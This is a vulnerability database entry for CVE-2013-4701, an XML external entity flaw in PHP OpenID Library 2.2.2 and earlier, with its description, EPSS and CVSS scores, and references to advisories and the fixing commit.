Vulnerability Details : CVE-2013-4701
Auth/Yadis/XML.php in PHP OpenID Library 2.2.2 and earlier allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via XRDS data containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.
Vulnerability category: XML external entity (XXE) injectionDenial of service
Products affected by CVE-2013-4701
- cpe:2.3:a:janrain:php-openid:*:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2013-4701
0.64%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ 77 %
Percentile, the proportion of vulnerabilities that are scored at or less
CVSS scores for CVE-2013-4701
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
7.5
|
HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
10.0
|
6.4
|
NIST |
References for CVE-2013-4701
-
http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00028.html
[security-announce] openSUSE-SU-2016:2025-1: important: Important securi
-
http://jvndb.jvn.jp/jvndb/JVNDB-2013-000080
JVNDB-2013-000080 - JVN iPedia - 脆弱性対策情報データベース
-
http://jvn.jp/en/jp/JVN24713981/index.html
JVN#24713981: PHP OpenID Library vulnerable to XML external entity injection
-
http://lists.opensuse.org/opensuse-updates/2016-08/msg00083.html
openSUSE-SU-2016:2114-1: moderate: Security update for typo3-cms-4_7
-
https://github.com/openid/php-openid/commit/625c16bb28bb120d262b3f19f89c2c06cb9b0da9
disable external XML entities and libxml errors · openid/php-openid@625c16b · GitHubExploit;Patch
Jump to